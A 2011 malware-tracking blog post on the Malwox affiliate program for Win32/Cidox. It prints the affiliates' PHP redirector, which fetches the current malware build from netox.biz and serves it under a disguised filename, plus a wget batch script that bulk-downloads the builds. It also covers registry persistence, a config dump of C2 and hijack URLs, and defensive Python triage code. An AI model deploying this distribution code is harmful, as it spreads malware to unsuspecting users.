Wednesday 9 November 2011

Tracking Cyber Crime: Malwox (Win32/Cidox Affiliate) Mayachok.1

Adv:

ICQ ~

Registration is simple. First you need a cookie, otherwise you only see a blank page (this keeps out the curious). After that you can create your account, but you need an invite plus activation by an admin.


Login:

Registration:








Statistic of the day:

Malware download:

Profile:

News:

Redirector (the affiliate's download page; on every hit it fetches the affiliate's current build from the Malwox host and streams it to the visitor, so the served binary is whatever netox.biz holds at that moment):
<?php
 // user_id.exe is the per-affiliate build on the distribution host.
 // copy() from an http:// URL needs allow_url_fopen on the affiliate's server.
 $filename = './soft.exe';
 copy('http://netox.biz/files/user_id.exe', 'soft.exe');
 // Internet Explorer gets the non-standard force-download type,
 // every other browser gets octet-stream.
 if (isset($_SERVER['HTTP_USER_AGENT']) and strpos($_SERVER['HTTP_USER_AGENT'],
 'MSIE'))
 Header('Content-Type: application/force-download');
 else
 Header('Content-Type: application/octet-stream');
 Header('Accept-Ranges: bytes');
 Header('Content-Length: ' . filesize($filename));
 // The name the victim sees comes from ?fname=, transliterated from Cyrillic,
 // with the word "Скачать" ("Download") stripped and ".exe" appended.
 Header('Content-disposition: attachment; filename="' . translitIt($_GET['fname']) .
 '.exe"');
 readfile($filename);
 exit();

 // Cyrillic-to-Latin transliteration; spaces become underscores.
 function translitIt($str)
 {
 $tr = array("А" => "A", "Б" => "B", "В" => "V", "Г" => "G", "Д" => "D", "Е" =>
 "E", "Ж" => "J", "З" => "Z", "И" => "I", "Й" => "Y", "К" => "K", "Л" => "L", "М" =>
 "M", "Н" => "N", "О" => "O", "П" => "P", "Р" => "R", "С" => "S", "Т" => "T", "У" =>
 "U", "Ф" => "F", "Х" => "H", "Ц" => "TS", "Ч" => "CH", "Ш" => "SH", "Щ" => "SCH",
 "Ъ" => "", "Ы" => "YI", "Ь" => "", "Э" => "E", "Ю" => "YU", "Я" => "YA", "а" =>
 "a", "б" => "b", "в" => "v", "г" => "g", "д" => "d", "е" => "e", "ж" => "j", "з" =>
 "z", "и" => "i", "й" => "y", "к" => "k", "л" => "l", "м" => "m", "н" => "n", "о" =>
 "o", "п" => "p", "р" => "r", "с" => "s", "т" => "t", "у" => "u", "ф" => "f", "х" =>
 "h", "ц" => "ts", "ч" => "ch", "ш" => "sh", "щ" => "sch", "ъ" => "y", "ы" =>
 "yi", "ь" => "", "э" => "e", "ю" => "yu", "я" => "ya", " " => "_");
 // "Скачать" / "скачать" = "Download" in Russian, removed from the link text.
 $sk = array("Скачать", "скачать");
 return strtr(str_replace($sk, "", $str), $tr);
 }
 ?>

Sample downloader (or just mail me and I'll send you a pack). It walks the user_<id>.exe naming seen in the redirector and pulls every affiliate build from the distribution host:
@echo off
rem Every affiliate build lives at netox.biz/files/user_<id>.exe; fetch ids 1..666 into .\www
set target=netox.biz/files/
set filename1=user_
set filename2=.exe
set droppath=www
set start=1
set end=666
set step=1
if not exist %droppath% (
mkdir %droppath% )
rem -U sends the same MSIE user agent the redirector looks for, -S prints the
rem server headers, -t 100 retries each file up to 100 times, -O fixes the output name.
FOR /L %%G IN (%start%, %step%, %end%) DO wget -U "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" -S -t 100 -P / "%target%%filename1%%%G%filename2%" -O "%droppath%/%filename1%%%G%filename2%"
echo.
echo Done.
pause



Cidox also seems to be repacked (I don't know at what interval) to avoid detection.

The Malwox people are responsible for the willysy.com mass injection that is still ongoing.
Here are some screenshots I took from the panel:



The payload DLL is registered in AppInit_DLLs (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows), in my case as C:\WINDOWS\system32\yxobjxi.dll, so it is loaded into every process that loads user32.dll.
The dropper writes all the required information and then reboots the computer with ExitWindowsEx.
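A quick triage check for that persistence point, added here as an example (my code, not the post's and not the malware's): it splits an AppInit_DLLs value the way Windows does (space- or comma-separated), flags any DLL not on an allowlist you supply, hashes the file if it is present, and on Windows can read the live value with winreg. The sample path is the one from this post; the allowlist entry vendor.dll and the C:\Tools path are made up.

```python
"""Triage of the AppInit_DLLs persistence the Cidox dropper uses.

Added example, not code from the post or from the malware.  The registry
key is the real one; the sample values at the bottom are constructed.
"""
import hashlib
import os
import sys
from typing import Dict, Iterable, List, Optional, Tuple

# Key that user32.dll consults when a new process loads it.
APPINIT_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"


def split_appinit_value(value: str) -> List[str]:
    """Split a REG_SZ AppInit_DLLs value into individual DLL paths.

    Windows accepts both space- and comma-separated lists (a path containing
    spaces therefore has to be given in 8.3 form), so both are split on here.
    """
    return [p.strip().strip('"') for p in value.replace(",", " ").split()]


def triage_appinit(value: str, load_flag: int = 1,
                   known_good: Iterable[str] = ()) -> List[Dict[str, object]]:
    """Return one finding per DLL path in `value`.

    `load_flag` is LoadAppInit_DLLs (Vista and later; pass 1 on XP, where the
    value does not exist and a non-empty AppInit_DLLs is always honoured).
    Anything whose file name is not in `known_good` is marked suspicious.
    """
    allow = {n.lower() for n in known_good}
    findings: List[Dict[str, object]] = []
    for path in split_appinit_value(value):
        name = os.path.basename(path.replace("\\", "/")).lower()
        finding: Dict[str, object] = {
            "path": path,
            "will_load": bool(load_flag),
            "suspicious": name not in allow,
            "sha256": None,
        }
        if os.path.isfile(path):  # hash it for lookup/submission when run on the box
            with open(path, "rb") as fh:
                finding["sha256"] = hashlib.sha256(fh.read()).hexdigest()
        findings.append(finding)
    return findings


def read_live_appinit() -> Optional[Tuple[str, int]]:
    """Read AppInit_DLLs / LoadAppInit_DLLs from the live registry (Windows only)."""
    if sys.platform != "win32":
        return None
    import winreg  # only importable on Windows
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, APPINIT_KEY) as key:
        value, _ = winreg.QueryValueEx(key, "AppInit_DLLs")
        try:
            load_flag, _ = winreg.QueryValueEx(key, "LoadAppInit_DLLs")
        except FileNotFoundError:
            load_flag = 1  # XP: no LoadAppInit_DLLs value
    return str(value), int(load_flag)


if __name__ == "__main__":
    live = read_live_appinit()
    if live is None:
        # Constructed sample: the path from this post plus a made-up vendor DLL.
        live = (r"C:\WINDOWS\system32\yxobjxi.dll,C:\Tools\vendor.dll", 1)
    for f in triage_appinit(*live, known_good=("vendor.dll",)):
        print(("SUSPICIOUS " if f["suspicious"] else "known      ") + str(f["path"]))
```

On a live XP box the value is honoured whenever it is non-empty, which is why a single unfamiliar DLL in System32 with a random-looking name is already a finding; on Vista and later also confirm LoadAppInit_DLLs is 1 before assuming the DLL is actually being injected.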

dumped part of the dll from explorer, broken at what look like record boundaries (the get.php URLs with key/id/os/av/vm parameters, then one watched host per line with the URL it is paired with, then a post.php endpoint; the spaces inside URLs are where the strings were split in memory):
30
yandexapps.com/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351
gcoglestats.com/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351
msn-dns.com/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351
94.102.49.64/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351
youtube.com t/terms 0 yandexapps.com/yt_lxegvj4efc/tube.php?uid= &id= &url=
help.vkontakte.ru 0 yandexapps.com/lo_nhyg38deijiwsx/vhelp.php?uid= &id= &url=
help.mail.ru 0 yandexapps.com/ma_ghjkmnbgvfrt/mail.php?uid= &id= &url=
admin.vkontakte.ru 0 yandexapps.com/lo_nhyg38deijiwsx/kr_vnhuirw43/vadmin.php?uid= &id= &url=
update.microsoft.com 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url=
update.mozilla.org 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url=
download.opera.com 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url=
chrome.google.com 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url=
official.odnoklassniki.ru 0 yandexapps.com/od_xafhuy2ed/ohelp.php?uid= &id= &url=
rushotgirls.com 0 yandexapps.com/bn_9iknfbcgtl/index.php?uid= &id= &url=
internet.com 0 yandexapps.com/in_xbvgyui3vf/index.php?uid= &id= &url=
*.co.cc 0 www.yandex.ru/
yandexapps.com/loPtfdn3dSasoicn/post.php?id= &form= &url=
!CFG
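As an added example (my code, not the author's and not the malware's own parser), here is a parse of that dump into something you can query. It assumes the layout is: a leading number, the get.php check-in URLs, then entries of the form <host> [<path>] 0 <paired URL> where each "&name=" piece belongs to the URL before it, then the post.php endpoint, then "!CFG". How the DLL really matches hosts is not visible in the dump, so the exact-or-wildcard logic in match_host is an assumption, as is calling the get.php URLs check-ins.

```python
"""Parser for the host-hijack config dumped from the Cidox DLL above.

Added example, not the malware's own parser.  Layout assumed from the dump:
<number> <get.php url>... (<host> [<path>] 0 <paired url>)... <post.php url> !CFG
"""
from dataclasses import dataclass, field
from typing import List, Optional, Set

# The dump as printed in the post; "&id=" etc. are query fragments of the URL before them.
RAW_CONFIG = (
    "30 "
    "yandexapps.com/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351 "
    "gcoglestats.com/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351 "
    "msn-dns.com/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351 "
    "94.102.49.64/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351 "
    "youtube.com t/terms 0 yandexapps.com/yt_lxegvj4efc/tube.php?uid= &id= &url= "
    "help.vkontakte.ru 0 yandexapps.com/lo_nhyg38deijiwsx/vhelp.php?uid= &id= &url= "
    "help.mail.ru 0 yandexapps.com/ma_ghjkmnbgvfrt/mail.php?uid= &id= &url= "
    "admin.vkontakte.ru 0 yandexapps.com/lo_nhyg38deijiwsx/kr_vnhuirw43/vadmin.php?uid= &id= &url= "
    "update.microsoft.com 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url= "
    "update.mozilla.org 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url= "
    "download.opera.com 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url= "
    "chrome.google.com 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url= "
    "official.odnoklassniki.ru 0 yandexapps.com/od_xafhuy2ed/ohelp.php?uid= &id= &url= "
    "rushotgirls.com 0 yandexapps.com/bn_9iknfbcgtl/index.php?uid= &id= &url= "
    "internet.com 0 yandexapps.com/in_xbvgyui3vf/index.php?uid= &id= &url= "
    "*.co.cc 0 www.yandex.ru/ "
    "yandexapps.com/loPtfdn3dSasoicn/post.php?id= &form= &url= !CFG"
)


@dataclass
class HijackRule:
    host: str          # host the DLL watches for; "*." prefix = wildcard
    paths: List[str]   # optional path fragments listed before the flag
    flag: str          # "0" for every entry in this dump; meaning unknown
    target: str        # URL the entry is paired with


@dataclass
class CidoxConfig:
    header: str
    c2: List[str] = field(default_factory=list)
    rules: List[HijackRule] = field(default_factory=list)
    post_url: Optional[str] = None


def _join_fragments(tokens: List[str]) -> List[str]:
    """Re-attach '&name=' query fragments to the URL token before them."""
    out: List[str] = []
    for tok in tokens:
        if tok.startswith("&") and out:
            out[-1] += tok
        else:
            out.append(tok)
    return out


def parse_config(raw: str) -> CidoxConfig:
    toks = _join_fragments(raw.split())
    if not toks or toks[-1] != "!CFG":
        raise ValueError("missing !CFG terminator")
    toks = toks[:-1]
    cfg = CidoxConfig(header=toks[0])
    i = 1
    while i < len(toks) and "get.php" in toks[i]:      # check-in URLs (assumed role)
        cfg.c2.append(toks[i])
        i += 1
    while i < len(toks):                               # <host> [<path>...] 0 <target>
        try:
            j = toks.index("0", i)
        except ValueError:
            break
        if j + 1 >= len(toks):
            break
        cfg.rules.append(HijackRule(toks[i], toks[i + 1:j], toks[j], toks[j + 1]))
        i = j + 2
    if i < len(toks):                                  # whatever remains: post.php endpoint
        cfg.post_url = toks[i]
    return cfg


def match_host(cfg: CidoxConfig, host: str) -> Optional[HijackRule]:
    """Rule that applies to `host`: exact match, or suffix match for '*.' patterns.
    Assumption: the real matching logic is not visible in the dump."""
    host = host.lower()
    for rule in cfg.rules:
        pat = rule.host.lower()
        if pat.startswith("*.") and host.endswith(pat[1:]):
            return rule
        if host == pat:
            return rule
    return None


def indicator_domains(cfg: CidoxConfig) -> Set[str]:
    """Hosts named anywhere in the config.  www.yandex.ru is a legitimate site
    used as a redirect target; weed such entries out before blocklisting."""
    urls = cfg.c2 + [r.target for r in cfg.rules] + ([cfg.post_url] if cfg.post_url else [])
    return {u.split("/", 1)[0] for u in urls}


if __name__ == "__main__":
    cfg = parse_config(RAW_CONFIG)
    for r in cfg.rules:
        print(f"{r.host:28} {' '.join(r.paths):10} -> {r.target}")
    print("indicators:", sorted(indicator_domains(cfg)))
```

The interesting part for an analyst is the rule list: update.microsoft.com, update.mozilla.org, download.opera.com and chrome.google.com all point at the same bt_pdfn3skxler/index.php, so a victim trying to fetch an update or a new browser is steered to one attacker page, while the social-network help/admin hosts each get their own.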
